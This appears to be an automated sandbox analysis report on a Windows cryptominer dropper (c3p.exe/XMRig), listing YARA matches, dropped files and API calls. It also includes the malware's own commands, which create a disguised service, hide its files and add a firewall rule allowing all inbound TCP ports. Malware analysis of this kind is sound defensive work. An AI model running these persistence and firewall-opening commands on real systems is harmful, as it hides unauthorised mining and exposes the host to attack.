Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_00406733: __EH_prolog,CreateFileW,CloseHandle,_wcslen,CreateDirectoryW,_wcscpy,_wcslen,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

2_2_00406733

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_0040FA10 GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,

5_2_0040FA10

Source: C:\Users\user\Desktop\c3p.exe

File created: C:\Windows\debug\c3p\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\cmd.bat	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\config.json	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\SHA256SUMS	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\systems.exe	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\WinRing0x64.sys	Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe

File deleted: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437

Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004178F6	2_2_004178F6
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00401CC5	2_2_00401CC5
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041B859	2_2_0041B859
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040C816	2_2_0040C816
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041B02D	2_2_0041B02D
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004278C4	2_2_004278C4
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041F094	2_2_0041F094
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004140B2	2_2_004140B2
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00404942	2_2_00404942
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00415935	2_2_00415935
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004141CE	2_2_004141CE
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040C1F2	2_2_0040C1F2
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004102EA	2_2_004102EA
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00413A86	2_2_00413A86
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00427380	2_2_00427380
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040C449	2_2_0040C449
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041AC59	2_2_0041AC59
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041B439	2_2_0041B439
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004144E9	2_2_004144E9
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040FD6E	2_2_0040FD6E
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004055AD	2_2_004055AD
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00428E01	2_2_00428E01
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00426E3C	2_2_00426E3C
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00402EE8	2_2_00402EE8
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004167C9	2_2_004167C9
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041A784	2_2_0041A784
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00427FBC	2_2_00427FBC
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_00419522	5_2_00419522
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_00419522	9_2_00419522

Source: Joe Sandbox View

Dropped File: C:\Windows\debug\c3p\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\c3p.exe	Code function: String function: 0041A05C appears 37 times
Source: C:\Users\user\Desktop\c3p.exe	Code function: String function: 0041A670 appears 47 times
Source: C:\Users\user\Desktop\c3p.exe	Code function: String function: 0041F65C appears 38 times
Source: C:\Windows\debug\c3p\svchost.exe	Code function: String function: 00416A78 appears 62 times
Source: C:\Windows\debug\c3p\svchost.exe	Code function: String function: 0041257C appears 74 times
Source: C:\Windows\debug\c3p\svchost.exe	Code function: String function: 00405400 appears 58 times
Source: C:\Windows\debug\c3p\svchost.exe	Code function: String function: 004097B0 appears 36 times
Source: C:\Windows\debug\c3p\svchost.exe	Code function: String function: 004144F2 appears 38 times

Source: systems.exe.2.dr

Static PE information: Number of sections : 11 > 10

Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinRing0.sys2 vs c3p.exe
Source: c3p.exe, 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamexmrig.exe, vs c3p.exe

Source: c3p.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\debug\c3p\systems.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: WinRing0x64.sys.2.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.evad.mine.winEXE@27/7@5/3

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_004064B1 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

2_2_004064B1

Source: C:\Windows\debug\c3p\svchost.exe	Code function: GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,		5_2_0040FA10
Source: C:\Windows\debug\c3p\svchost.exe	Code function: GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,		9_2_0040FA10

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_0040A1E0 CreateToolhelp32Snapshot,GetLastError,Thread32First,GetLastError,CloseHandle,PostThreadMessageW,PostThreadMessageW,Thread32Next,PostThreadMessageW,Thread32Next,GetLastError,GetLastError,GetLastError,CloseHandle,

5_2_0040A1E0

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_00419A1E SendMessageW,GetObjectW,CoCreateInstance,_memset,CreateDIBSection,DeleteObject,

2_2_00419A1E

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_00405600 GetUserDefaultLangID,FindResourceExW,FindResourceExW,GetLastError,FindResourceExW,LoadResource,CreateDialogIndirectParamW,

5_2_00405600

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_0040EC60 __snwprintf_s,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError,

5_2_0040EC60

Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,		5_2_00409B70
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,		9_2_00409B70

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03

Source: C:\Users\user\Desktop\c3p.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "

Source: c3p.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\c3p.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c3p.exe

ReversingLabs: Detection: 68%

Source: systems.exe	String found in binary or memory: -h, --help display this help and exit
Source: systems.exe	String found in binary or memory: -h, --help display this help and exit
Source: systems.exe	String found in binary or memory: rget,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { (p++)=S_SETPC_B64_S12_13; return p; } } while (!done); } (p++)=S_SETPC_B64_S12_13; return p; } __attribute__((reqd_work_group_size(64,1,1))) __kernel void randomx_jit(_
Source: systems.exe	String found in binary or memory: --help
Source: systems.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\c3p.exe

File read: C:\Users\user\Desktop\c3p.exe

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: unknown	Process created: C:\Users\user\Desktop\c3p.exe "C:\Users\user\Desktop\c3p.exe"
Source: C:\Users\user\Desktop\c3p.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"
Source: unknown	Process created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
Source: C:\Windows\debug\c3p\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\debug\c3p\svchost.exe	Process created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\c3p.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Process created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe"	Jump to behavior

Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: w32time.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: bcp47langs.dll	Jump to behavior
